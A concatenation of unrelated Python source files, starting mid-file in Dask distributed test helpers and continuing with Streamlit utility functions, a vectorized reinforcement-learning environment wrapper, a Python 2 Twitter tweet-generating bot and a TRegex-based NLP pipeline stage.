certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip(f"rlimit too low ({soft}) and can't be increased: {e}")
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in sys.modules.keys():
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
"""Context manager to ensure we haven't leaked any threads"""
# "TCP-Executor" threads are never stopped once they are started
BaseTCPConnector.warmup()
active_threads_start = threading.enumerate()
yield
start = time()
while True:
bad_threads = [
thread
for thread in threading.enumerate()
if thread not in active_threads_start
# FIXME this looks like a genuine leak that needs fixing
and "watch message queue" not in thread.name
]
if not bad_threads:
break
else:
sleep(0.01)
if time() > start + 5:
# Raise an error with information about leaked threads
from distributed import profile
bad_thread = bad_threads[0]
call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident])
assert False, (bad_thread, call_stacks)
def wait_active_children(timeout: float) -> list[multiprocessing.Process]:
"""Wait until timeout for mp_context.active_children() to terminate.
Return list of active subprocesses after the timeout expired.
"""
t0 = time()
while True:
# Do not sample the subprocesses once at the beginning with
# `for proc in mp_context.active_children: ...`, assume instead that new
# children processes may be spawned before the timeout expires.
children = mp_context.active_children()
if not children:
return []
join_timeout = timeout - time() + t0
if join_timeout <= 0:
return children
children[0].join(timeout=join_timeout)
def term_or_kill_active_children(timeout: float) -> None:
"""Send SIGTERM to mp_context.active_children(), wait up to 3 seconds for processes
to die, then send SIGKILL to the survivors
"""
children = mp_context.active_children()
for proc in children:
proc.terminate()
children = wait_active_children(timeout=timeout)
for proc in children:
proc.kill()
children = wait_active_children(timeout=30)
if children: # pragma: nocover
logger.warning("Leaked unkillable children processes: %s", children)
# It should be impossible to ignore SIGKILL on Linux/MacOSX
assert WINDOWS
@contextmanager
def check_process_leak(
check: bool = True, check_timeout: float = 40, term_timeout: float = 3
):
"""Terminate any currently-running subprocesses at both the beginning and end of this context
Parameters
----------
check : bool, optional
If True, raise AssertionError if any processes survive at the exit
check_timeout: float, optional
Wait up to these many seconds for subprocesses to terminate before failing
term_timeout: float, optional
After sending SIGTERM to a subprocess, wait up to these many seconds before
sending SIGKILL
"""
term_or_kill_active_children(timeout=term_timeout)
try:
yield
if check:
children = wait_active_children(timeout=check_timeout)
assert not children, f"Test leaked subprocesses: {children}"
finally:
term_or_kill_active_children(timeout=term_timeout)
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
Worker._initialized_clients.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status in Status.ANY_RUNNING:
w.loop.add_callback(w.close)
Worker._instances.clear()
start = time()
while any(c.status != "closed" for c in Worker._initialized_clients):
sleep(0.1)
assert time() < start + 10
Worker._initialized_clients.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
raise ValueError("Unclosed Comms", L)
assert all(
n.status == Status.closed or n.status == Status.init for n in Nanny._instances
), {n: n.status for n in Nanny._instances}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == Status.closed for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
with check_thread_leak() if threads else nullcontext():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else nullcontext():
with check_active_rpc(loop, timeout):
reset_config()
with dask.config.set(
{
"distributed.comm.timeouts.connect": "5s",
"distributed.admin.tick.interval": "500 ms",
}
):
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
@pytest.fixture
def cleanup():
with clean():
yield
class TaskStateMetadataPlugin(WorkerPlugin):
"""WorkPlugin to populate TaskState.metadata"""
def setup(self, worker):
self.worker = worker
def transition(self, key, start, finish, **kwargs):
ts = self.worker.tasks[key]
if start == "ready" and finish == "executing":
ts.metadata["start_time"] = time()
elif start == "executing" and finish == "memory":
ts.metadata["stop_time"] = time()
class LockedComm(TCP):
def __init__(self, comm, read_event, read_queue, write_event, write_queue):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.comm = comm
assert isinstance(comm, TCP)
def __getattr__(self, name):
return getattr(self.comm, name)
async def write(self, msg, serializers=None, on_error="message"):
if self.write_queue:
await self.write_queue.put((self.comm.peer_address, msg))
if self.write_event:
await self.write_event.wait()
return await self.comm.write(msg, serializers=serializers, on_error=on_error)
async def read(self, deserializers=None):
msg = await self.comm.read(deserializers=deserializers)
if self.read_queue:
await self.read_queue.put((self.comm.peer_address, msg))
if self.read_event:
await self.read_event.wait()
return msg
async def close(self):
await self.comm.close()
class _LockedCommPool(ConnectionPool):
"""A ConnectionPool wrapper to intercept network traffic between servers
This wrapper can be attached to a running server to intercept outgoing read or write requests in test environments.
Examples
--------
>>> w = await Worker(...)
>>> read_event = asyncio.Event()
>>> read_queue = asyncio.Queue()
>>> w.rpc = _LockedCommPool(
w.rpc,
read_event=read_event,
read_queue=read_queue,
)
# It might be necessary to remove all existing comms
# if the wrapped pool has been used before
>>> w.remove(remote_address)
>>> async def ping_pong():
return await w.rpc(remote_address).ping()
>>> with pytest.raises(asyncio.TimeoutError):
>>> await asyncio.wait_for(ping_pong(), 0.01)
>>> read_event.set()
>>> await ping_pong()
"""
def __init__(
self, pool, read_event=None, read_queue=None, write_event=None, write_queue=None
):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.pool = pool
def __getattr__(self, name):
return getattr(self.pool, name)
async def connect(self, *args, **kwargs):
comm = await self.pool.connect(*args, **kwargs)
return LockedComm(
comm, self.read_event, self.read_queue, self.write_event, self.write_queue
)
async def close(self):
await self.pool.close()
def xfail_ssl_issue5601():
"""Work around https://github.com/dask/distributed/issues/5601 where any test that
inits Security.temporary() crashes on MacOS GitHub Actions CI
"""
pytest.importorskip("cryptography")
try:
Security.temporary()
except ImportError:
if MACOS:
pytest.xfail(reason="distributed#5601")
raise
def assert_worker_story(
story: list[tuple], expect: list[tuple], *, strict: bool = False
) -> None:
"""Test the output of ``Worker.story``
Parameters
==========
story: list[tuple]
Output of Worker.story
expect: list[tuple]
Expected events. Each expected event must contain exactly 2 less fields than the
story (the last two fields are always the stimulus_id and the timestamp).
Elements of the expect tuples can be
- callables, which accept a single element of the event tuple as argument and
return True for match and False for no match;
- arbitrary objects, which are compared with a == b
e.g.
.. code-block:: python
expect=[
("x", "missing", "fetch", "fetch", {}),
("gather-dependencies", worker_addr, lambda set_: "x" in set_),
]
strict: bool, optional
If True, the story must contain exactly as many events as expect.
If False (the default), the story may contain more events than expect; extra
events are ignored.
"""
now = time()
prev_ts = 0.0
for ev in story:
try:
assert len(ev) > 2
assert isinstance(ev, tuple)
assert isinstance(ev[-2], str) and ev[-2] # stimulus_id
assert isinstance(ev[-1], float) # timestamp
assert prev_ts <= ev[-1] # Timestamps are monotonic ascending
# Timestamps are within the last hour. It's been observed that a timestamp
# generated in a Nanny process can be a few milliseconds in the future.
assert now - 3600 < ev[-1] <= now + 1
prev_ts = ev[-1]
except AssertionError:
raise AssertionError(
f"Malformed story event: {ev}\nin story:\n{_format_story(story)}"
)
try:
if strict and len(story) != len(expect):
raise StopIteration()
story_it = iter(story)
for ev_expect in expect:
while True:
event = next(story_it)
# Ignore (stimulus_id, timestamp)
event = event[:-2]
if len(event) == len(ev_expect) and all(
ex(ev) if callable(ex) else ev == ex
for ev, ex in zip(event, ev_expect)
):
break
except StopIteration:
raise AssertionError(
f"assert_worker_story({strict=}) failed\n"
f"story:\n{_format_story(story)}\n"
f"expect:\n{_format_story(expect)}"
) from None
def _format_story(story: list[tuple]) -> str:
if not story:
return "(empty story)"
return "- " + "\n- ".join(str(ev) for ev in story)
class BrokenComm(Comm):
peer_address = ""
local_address = ""
def close(self):
pass
def closed(self):
return True
def abort(self):
pass
def read(self, deserializers=None):
raise OSError()
def write(self, msg, serializers=None, on_error=None):
raise OSError()
def has_pytestmark(test_func: Callable, name: str) -> bool:
"""Return True if the test function is marked by the given @pytest.mark.<name>;
False otherwise.
FIXME doesn't work with individually marked parameters inside
@pytest.mark.parametrize
"""
marks = getattr(test_func, "pytestmark", [])
return any(mark.name == name for mark in marks)
|
utils.py
|
import os
import datetime
from multiprocessing import Process
import time
import yaml
import streamlit as st
import psutil
import pandas as pd
from typing import Callable, Union, Tuple
def get_size(path: str ) -> float:
"""
Helper function to get size of a path (file / folder)
Args:
path (str): Path to the folder / file.
Returns:
float: Total size in bytes.
"""
if path.endswith(".d"):
size_function = get_folder_size
else:
size_function = os.path.getsize
return size_function(path)
def get_folder_size(start_path: str ) -> float:
"""Returns the total size of a given folder.
Args:
start_path (str): Path to the folder that should be checked.
Returns:
float: Total size in bytes.
"""
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
# skip if it is symbolic link
if not os.path.islink(fp):
total_size += os.path.getsize(fp)
return total_size
def escape_markdown(text: str) -> str:
"""Helper function to escape markdown in text.
Args:
text (str): Input text.
Returns:
str: Converted text to be used in markdown.
"""
MD_SPECIAL_CHARS = "\`*_{}[]()#+-.!"
for char in MD_SPECIAL_CHARS:
text = text.replace(char, "\\" + char)
return text
def markdown_link(description: str, link: str):
"""Creates a markdown compatible link.
Args:
description (str): Description.
link (str): Target URL.
"""
_ = f"[{description}]({link})"
st.markdown(_, unsafe_allow_html=True)
def files_in_folder(folder: str, ending: str, sort: str = "name") -> list:
"""Reads a folder and returns all files that have this ending. Sorts the files by name or creation date.
Args:
folder (str): Path to folder.
ending (str): Ending.
sort (str, optional): How files should be sorted. Defaults to 'name'.
Raises:
NotImplementedError: If a sorting mode is called that is not implemented.
Returns:
list: List of files.
"""
files = [_ for _ in os.listdir(folder) if _.endswith(ending)]
if sort == "name":
files.sort()
elif sort == "date":
files.sort(key=lambda x: os.path.getctime(os.path.join(folder, x)))
else:
raise NotImplementedError
files = files[::-1]
return files
def files_in_folder_pandas(folder: str) -> pd.DataFrame:
"""Reads a folder and returns a pandas dataframe containing the files and additional information.
Args:
folder (str): Path to folder.
Returns:
pd.DataFrame: PandasDataFrame.
"""
files = os.listdir(folder)
created = [time.ctime(os.path.getctime(os.path.join(folder, _))) for _ in files]
sizes = [get_size(os.path.join(folder, _)) / 1024 ** 2 for _ in files]
df = pd.DataFrame(files, columns=["File"])
df["Created"] = created
df["Filesize (Mb)"] = sizes
return df
def read_log(log_path: str):
"""Reads logfile and removes lines with __.
Lines with __ are used to indicate progress for the AlphaPept GUI.
Args:
log_path (str): Path to the logile.
"""
if os.path.isfile(log_path):
with st.expander("Run log"):
with st.spinner("Parsing file"):
with open(log_path, "r") as logfile:
lines = logfile.readlines()
lines = [_ for _ in lines if "__" not in _]
st.code("".join(lines))
def start_process(
target: Callable,
process_file: str,
args: Union[list, None] = None,
verbose: bool = True,
):
"""Function to initiate a process. It will launch the process and save the process id to a yaml file.
Args:
target (Callable): Target function for the process.
process_file (str): Path to the yaml file where the process information will be stored.
args (Union[list, None], optional): Additional arguments for the process. Defaults to None.
verbose (bool, optional): Flag to show a stramlit message. Defaults to True.
"""
process = {}
now = datetime.datetime.now()
process["created"] = now
if args:
p = Process(target=target, args=args)
else:
p = Process(target=target)
p.start()
process["pid"] = p.pid
if verbose:
st.success(f"Started process PID {p.pid} at {now}")
with open(process_file, "w") as file:
yaml.dump(process, file, sort_keys=False)
def check_process(
process_path: str,
) ->Tuple[bool, Union[str, None], Union[str, None], Union[str, None], bool]:
"""Function to check the status of a process.
Reads the process file from the yaml and checks the process id.
Args:
process_path (str): Path to the process file.
Returns:
bool: Flag if process exists.
Union ([str, None]): Process id if process exists, else None.
Union ([str, None]): Process name if process exists, else None.
Union ([str, None]): Process status if process exists, else None.
bool ([type]): Flag if process was initialized.
"""
if os.path.isfile(process_path):
with open(process_path, "r") as process_file:
process = yaml.load(process_file, Loader=yaml.FullLoader)
if process:
last_pid = process["pid"]
if "init" in process:
p_init = process["init"]
else:
p_init = False
if psutil.pid_exists(last_pid):
p_ = psutil.Process(last_pid)
with p_.oneshot():
p_name = p_.name()
status = p_.status()
return True, last_pid, p_name, status, p_init
return False, None, None, None, False
def init_process(process_path: str, **kwargs: dict):
"""Waits until a process file is created and then writes an init flag to the file
Args:
process_path (str): Path to process yaml.
"""
while True:
if os.path.isfile(process_path):
with open(process_path, "r") as process_file:
process = yaml.load(process_file, Loader=yaml.FullLoader)
process["init"] = True
for _ in kwargs:
process[_] = kwargs[_]
with open(process_path, "w") as file:
yaml.dump(process, file, sort_keys=False)
break
else:
time.sleep(1)
def check_file(path: str) -> bool:
"""Function to check if a file exists.
This function will also return if the file is None.
Args:
path (str): Path to the file to be checked.
Returns:
bool: Flag if file or path exists..
"""
if path:
if os.path.isfile(path):
return True
else:
return False
else:
return False
def compare_date(date: str, minimum_date: datetime) -> bool:
"""Utility function to convert the acquisition date time to a datetime format.
Checks if it was before the minimum_date.
Args:
date (str): Datetime as string.
minimum_date (dateime): Comparison
Returns:
bool: Flag if file was acquired after the minimum date.
"""
if not date:
return False
if date.endswith('Z'):
rem = date.split('.')[1]
if len(rem) == 8:
date = date[:-2]+'Z'
dt = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%fZ')
else:
dt = datetime.datetime.fromisoformat(date).replace(tzinfo=None)
if dt > minimum_date:
return True
else:
return False
|
vec_env.py
|
import argparse
import cloudpickle
from multiprocessing import Process, Pipe
import numpy as np
from .base import BaseEnv
class RunningNormalizer(object):
def __init__(self, shape):
self.shape = shape
self.running_mean = np.zeros(shape)
self.running_var, self.running_std = np.ones(shape), np.ones(shape)
self.count = 1e-8
def update(self, obs):
if len(obs.shape) == len(self.shape):
obs = np.expand_dims(obs, 0)
batch_mean, batch_var = obs.mean(0), obs.var(0)
batch_size = obs.shape[0]
self._update_batch(batch_mean, batch_var, batch_size)
def _update_batch(self, batch_mean, batch_var, batch_size):
new_count = self.count + batch_size
delta_mean = batch_mean - self.running_mean
self.running_mean += delta_mean * batch_size / new_count
square_sum = self.running_var * self.count + batch_var * batch_size + (delta_mean ** 2) * self.count * batch_size / new_count
self.running_var = square_sum / new_count
self.running_std = np.sqrt(self.running_var + 1e-8)
self.count = new_count
def normalize(self, obs):
return (obs - self.running_mean) / self.running_std
def denormalize(self, obs):
return self.running_mean + obs * self.running_std
class CloudpickleWrapper(object):
"""Couldpickle allows more general object serialization
"""
def __init__(self, a):
self.a = a
def __getstate__(self):
return cloudpickle.dumps(self.var)
def __setstate__(self, a):
self.a = cloudpickle.loads(a)
def _worker(remote, parent_remote, env_fn_wrapper):
"""Subprocessed workers of the environment
"""
parent_remote.close()
env = env_fn_wrapper.a()
while True:
try:
cmd, data = remote.recv()
if cmd == "reset":
obs = env.reset()
remote.send(obs)
elif cmd == "step":
obs, reward, done, info = env.step(data)
if done:
obs = env.reset()
remote.send((obs, reward, done, info))
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "train":
env.train()
elif cmd == "eval":
env.eval()
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_base_info":
remote.send((env.continuous_action_space, env.n_obs, env.n_act))
else:
raise NotImplementedError
except EOFError:
break
class VecEnv(BaseEnv):
"""The vectorized environment contains the observation/reward normalization part
"""
def __init__(self):
super(VecEnv, self).__init__()
parser = argparse.ArgumentParser()
parser.add_argument("--scenario", default="control", choices=["control", "atari", "mujoco"])
parser.add_argument("--gamma", default=0.99, type=float)
args = parser.parse_known_args()[0]
self.gamma = args.gamma
self.normalize_obs = args.scenario in ["control", "mujoco"]
self.normalize_reward = args.scenario in ["control", "atari", "mujoco"]
def init_normalizer(self):
self.obs_normalizer = RunningNormalizer(self.n_obs) if self.normalize_obs else None
self.ret = np.zeros(self.num_env)
self.ret_normalizer = RunningNormalizer((self.num_env, )) if self.normalize_reward else None
def process_obs(self, obs):
if self.obs_normalizer:
self.obs_normalizer.update(obs)
obs = self.obs_normalizer.normalize(obs)
return obs
def process_reward(self, reward, done):
self.ret = reward + self.gamma * self.ret
if self.normalize_reward:
self.ret_normalizer.update(self.ret)
reward /= self.ret_normalizer.running_std
self.ret[done] = 0
return reward
@property
def reward_scale_factor(self):
return self.ret_normalizer.running_std if self.normalize_reward else 1
class DummyVecEnv(VecEnv):
"""The vectorized environment should inherit all necessary methods and properties of the normal base environment
For DummyVecEnv, the environments are actually parallelized virtually in a serialized way in one process
"""
def __init__(self, env_fns):
super(DummyVecEnv, self).__init__()
self.num_env = len(env_fns)
self.envs = [env_fn() for env_fn in env_fns]
self.continuous_action_space = self.envs[0].continuous_action_space
self.n_obs, self.n_act = self.envs[0].n_obs, self.envs[0].n_act
self.init_normalizer()
def reset(self):
obs = np.stack([env.reset() for env in self.envs])
self.ret = np.zeros(self.num_env)
return self.process_obs(obs)
def step(self, actions):
results = [env.step(actions[k]) for k, env in enumerate(self.envs)]
old_obs, reward, done, info = zip(*results)
new_obs = [env.reset() if done else obs for obs, done, env in zip(old_obs, done, self.envs)]
obs, reward, done = np.stack(new_obs), np.stack(reward), np.stack(done)
obs, reward = self.process_obs(obs), self.process_reward(reward, done)
return obs, reward, done, {"vec_info": info}
def train(self):
self.training = True
for env in self.envs:
env.train()
def eval(self):
self.training = False
for env in self.envs:
env.eval()
def render(self):
raise NotImplementedError
def close(self):
for env in self.envs:
env.close()
class SubprocVecEnv(VecEnv):
"""The vectorized environment should inherit all necessary methods and properties of the normal base environment
We activate a subprocess for each single environment and communicate with them as remote workers, and we always run them asynchronously but the environments should be aligned by time step
"""
def __init__(self, env_fns):
super(SubprocVecEnv, self).__init__()
self.waiting = False
self.closed = False
self.num_env = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(self.num_env)])
self.ps = [
Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)), daemon=True)
for remote, work_remote, env_fn in zip(self.remotes, self.work_remotes, env_fns)
]
for p in self.ps:
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(("get_base_info", None))
self.continuous_action_space, self.n_obs, self.n_act = self.remotes[0].recv()
self.init_normalizer()
def reset(self):
for remote in self.remotes:
remote.send(("reset", None))
obs = np.stack([remote.recv() for remote in self.remotes])
self.ret = np.zeros(self.num_env)
return self.process_obs(obs)
def step_async(self, actions):
self.waiting = True
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, reward, done, info = zip(*results)
obs, reward, done = np.stack(obs), np.stack(reward), np.stack(done)
obs, reward = self.process_obs(obs), self.process_reward(reward, done)
return obs, reward, done, {"vec_info": info}
def step(self, actions):
self.step_async(actions)
return self.step_wait()
def train(self):
self.training = True
for remote in self.remotes:
remote.send(("train", None))
def eval(self):
self.training = False
for remote in self.remotes:
remote.send(("eval", None))
def render(self):
raise NotImplementedError
def close(self):
if self.closed: return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for p in self.ps:
p.join()
self.closed = True
|
generate_tweets.py
|
#!/usr/bin/env python
"""Generate tweets based on what comes in along in the tweet stream."""
import sys
import os
import tweepy
import common
import time
import multiprocessing
import signal
import random
try:
import credentials
except ImportError:
raise StandardError("Please copy credentials_template.py to credentials.py and fill in the missing elements.")
from collections import Counter, defaultdict
TWEET_INTERVAL = 3600 * 3
SAMPLE_SIZE = 3
QUESTION_WORDS = {'where', 'what', 'who', 'what', 'how', 'why'}
SECOND_WORDS = {'is', 'was', 'were', 'should', 'do', 'does'}
REFLECT ={'you': 'I',
'yours': 'mine',
'your': 'my',
'i': 'you',
'mine': 'yours',
'my': 'your'}
CONNETIONS = {'where': 'in',
'why': 'because'}
def get_next_token(api, key, hash_tag_counter, length_so_far):
sample_counters = defaultdict(common.SampleCounter)
max_count = 0
max_key = None
tweet_count = 0
seen = set()
for tweet in tweepy.Cursor(api.search,
q='"%s" -filter:retweets' % (' '.join(key)),
rpp=100,
result_type="recent",
include_entities=True).items():
tokens = common.tokenize_tweet(tweet.text)
filtered = ''.join((tk for idx, tk in enumerate(tokens) if idx % 2 == 1))
if filtered in seen:
continue
tweet_count += 1
seen.add(filtered)
for token in tokens:
if token.startswith('#'):
hash_tag_counter[token] += 1
for idx in range(1, len(tokens) - len(key) * 2, 2):
for offset, token in enumerate(key):
if tokens[idx + offset * 2].lower() != token.lower():
break
else:
next_token = tokens[idx + offset * 2 + 2]
sample = tokens[idx + offset * 2 + 1]
sample_weight = 1
if idx + offset * 2 + 4 == len(tokens):
sample += 'X'
if length_so_far < 50:
sample_weight = 0.5
elif length_so_far > 70:
sample_weight = float(length_so_far) / 50
sample_counters[next_token].count += 1
sample_counters[next_token].sample[sample] += sample_weight
if sample_counters[next_token].count > max_count:
max_key = next_token
max_count = sample_counters[next_token].count
print 'best', max_key, max_count
if max_count >= SAMPLE_SIZE:
break
if max_count >= SAMPLE_SIZE:
break
if tweet_count % 25 == 0:
time.sleep(1)
if tweet_count > 150:
return True, '', ''
if max_key is None:
# Dead end
return True, '', ''
sample = sample_counters[max_key].sample.most_common(1)[0][0]
done = sample.endswith('X')
if done:
sample = sample[:-1]
return done, max_key, sample
def generate_new_tweet(auth, tokens):
key = tuple(x.lower() for idx, x in enumerate(tokens) if idx % 2 == 1)
tweet = ''.join(tokens)
tweepy_api = tweepy.API(auth)
hash_tag_counter = Counter()
done = False
first = True
while not done and len(tweet) < 140:
done, token, text = get_next_token(tweepy_api, key, hash_tag_counter, len(tweet))
if first and done and len(key) > 2:
key = key[1:]
done = False
continue
first = False
key += (token,)
while len(key) > 4:
key = key[1:]
tweet += text + token
print key, tweet
while len(tweet) > 140 and '.' in tweet:
tweet = tweet[:tweet.rfind('.')].strip()
if len(tweet) > 140:
return None
if not '#' in tweet:
for ht, cnt in hash_tag_counter.most_common():
if cnt <= 1:
print ht, cnt
break
if len(tweet) + len(ht) < 139:
print ht, cnt
tweet += ' ' + ht
break
return tweet
def reply_to(auth, text):
tokens = [REFLECT.get(t.lower(), t) for idx, t in enumerate(common.tokenize_tweet(text)) if idx % 2 == 1]
if tokens[0][0] == '@':
del tokens[0]
if len(tokens) < 4 or not tokens[0].lower() in QUESTION_WORDS or not (tokens[1].lower() in SECOND_WORDS or tokens[2].lower() in SECOND_WORDS):
reply = "I only understand simple questions. Yours I did not recognize: %s" % text
return reply[:120]
if not tokens[1].lower() in SECOND_WORDS:
del tokens[1]
if tokens[1].lower() in ('do', 'does'):
text = ' '.join(tokens[2:])
else:
text = ' '.join(tokens[2:]) + ' ' + tokens[1]
if tokens[0] in CONNETIONS:
text += ' ' + CONNETIONS[tokens[0]]
tokens = common.tokenize_tweet(text)
return generate_new_tweet(auth, tokens)
def post_tweets(queue):
starts = file(os.path.expanduser(common.TWEET_START_PATH)).read().splitlines()
auth = tweepy.OAuthHandler(credentials.CONSUMER_KEY, credentials.CONSUMER_SECRET)
auth.set_access_token(credentials.ACCESS_KEY, credentials.ACCESS_SECRET)
tweepy_api = tweepy.API(auth)
last_post = 0
while True:
if not queue.empty():
tweet = queue.get(block=False)
if tweet:
print 'got tweet from %s: %s' % (tweet.text, tweet.user)
new_tweet = reply_to(auth, tweet.text)
if not new_tweet:
new_tweet = "I could not find that."
tweepy_api.update_status(status='@%s: %s' % (tweet.user.screen_name, new_tweet), in_reply_to_status_id=tweet.id)
if time.time() - last_post > TWEET_INTERVAL:
a_start = random.choice(starts)
print 'starting from:', a_start
tokens = common.tokenize_tweet(a_start)
new_tweet = generate_new_tweet(auth, tokens)
if new_tweet:
tweepy_api.update_status(status=new_tweet)
last_post = time.time()
time.sleep(1)
class UserListener(tweepy.StreamListener):
def __init__(self, queue, screen_name):
super(UserListener, self).__init__()
self._queue = queue
self._screen_name = screen_name
def on_status(self, status):
text = status.text
print text
if text.startswith('@' + self._screen_name):
self._queue.put(status)
def on_error(self, status_code):
print >> sys.stderr, 'Encountered error with status code:', status_code
return True
def on_timeout(self):
print >> sys.stderr, 'Timeout...'
return True
def on_connect(self):
print 'Connected.'
return True
def watch_user(queue):
auth = tweepy.OAuthHandler(credentials.CONSUMER_KEY, credentials.CONSUMER_SECRET)
auth.set_access_token(credentials.ACCESS_KEY, credentials.ACCESS_SECRET)
tweepy_api = tweepy.API(auth)
me = tweepy_api.me()
listener = UserListener(queue, me.screen_name)
sapi = tweepy.streaming.Stream(auth, listener)
sapi.filter(follow=[me.id])
if __name__ == '__main__':
reply_queue = multiprocessing.Queue()
watch_user_process = multiprocessing.Process(target=watch_user, args=(reply_queue,))
post_tweets_process = multiprocessing.Process(target=post_tweets, args=(reply_queue,))
watch_user_process.start()
post_tweets_process.start()
def signal_handler(signal, frame):
print 'Exiting'
watch_user_process.terminate()
post_tweets_process.terminate()
signal.signal(signal.SIGINT, signal_handler)
print 'Press Ctrl+C to abort'
signal.pause()
|
tregex_stage.py
|
from gflags import (DEFINE_string, FLAGS, DuplicateFlagError, DEFINE_integer,
DEFINE_enum)
import itertools
import threading
import logging
from math import log10
from os import path
import Queue
import subprocess
import sys
import tempfile
import time
from threading import Lock
from nlpypline.data import Token
from nlpypline.pipeline import Stage
from nlpypline.pipeline.models import Model
from causeway import (PossibleCausation, PairwiseAndNonIAAEvaluator,
get_causation_tuple)
from nlpypline.util import pairwise, igroup, hash_file
from nlpypline.util.nltk import subtree_at_index, index_of_subtree
from nlpypline.util.scipy import steiner_tree, longest_path_in_tree
import os
try:
DEFINE_string('tregex_dir',
'/home/jesse/Documents/Work/Research/'
'stanford-corenlp-full-2015-04-20',
'Command to run TRegex')
DEFINE_integer(
'tregex_max_steiners', 6,
'Maximum number of Steiner nodes to be allowed in TRegex patterns')
DEFINE_integer('tregex_max_threads', 30,
'Max number of TRegex processor threads')
DEFINE_integer('tregex_max_cache_filename_len', 255,
'Max filename length to allow for files in the TRegex cache')
DEFINE_enum('tregex_pattern_type', 'dependency',
['dependency', 'constituency'],
'Type of tree to generate and run TRegex patterns with')
except DuplicateFlagError as e:
logging.warn('Ignoring flag redefinitions; assuming module reload')
class TRegexConnectiveModel(Model):
def __init__(self, *args, **kwargs):
super(TRegexConnectiveModel, self).__init__(*args, **kwargs)
self.tregex_patterns = []
# Internal hackery properties, used for training.
self._ptb_strings = None
self._num_sentences = None # Poor man's check for same sentences
def reset(self):
self.tregex_patterns = []
def _train_model(self, sentences):
ptb_strings = self._extract_patterns(sentences)
# Dirty hack to avoid redoing all the preprocessing when test() is
# called to provide input to the next stage.
self._ptb_strings = ptb_strings
self._num_sentences = len(sentences)
def test(self, sentences):
logging.info('Tagging possible connectives...')
start_time = time.time()
if (self._ptb_strings is not None
and self._num_sentences == len(sentences)):
ptb_strings = self._ptb_strings
self._ptb_strings = None
else:
ptb_strings = self._preprocess_sentences(sentences)
# Interacting with the TRegex processes is heavily I/O-bound, plus we
# really want multiple TRegex processes running in parallel, so we farm
# out patterns to worker threads.
# Queue up the patterns
total_estimated_bytes = 0
queue = Queue.Queue()
for (pattern, connective_labels, connective_lemmas
) in self.tregex_patterns:
possible_sentence_indices = self._filter_sentences_for_pattern(
sentences, pattern, connective_lemmas)
queue.put_nowait((pattern, connective_labels,
possible_sentence_indices, connective_lemmas))
# Estimate total output file size for this pattern: each
# sentence has sentence #, + 3 bytes for : and newlines.
# As a very rough estimate, matching node names increase the
# bytes used by ~1.85x.
total_estimated_bytes += sum(
1.85 * (int(log10(i + 1)) + 3)
for i in range(len(possible_sentence_indices)))
predicted_outputs = [[] for _ in range(len(sentences))]
logging.info("%d patterns in queue", queue.qsize())
# Start the threads
threads = []
for _ in range(FLAGS.tregex_max_threads):
new_thread = self.TregexProcessorThread(
sentences, ptb_strings, queue, predicted_outputs)
threads.append(new_thread)
new_thread.start()
# Set up progress reporter and wait for threads to finish.
all_threads_done = [False] # use a list for passing by ref (EVIL HACK)
progress_reporter = self._make_progress_reporter(
threads, total_estimated_bytes, all_threads_done)
try:
progress_reporter.start()
queue.join()
finally:
# Make sure progress reporter exits
all_threads_done[0] = True
elapsed_seconds = time.time() - start_time
logging.info("Done tagging possible connectives in %0.2f seconds"
% elapsed_seconds)
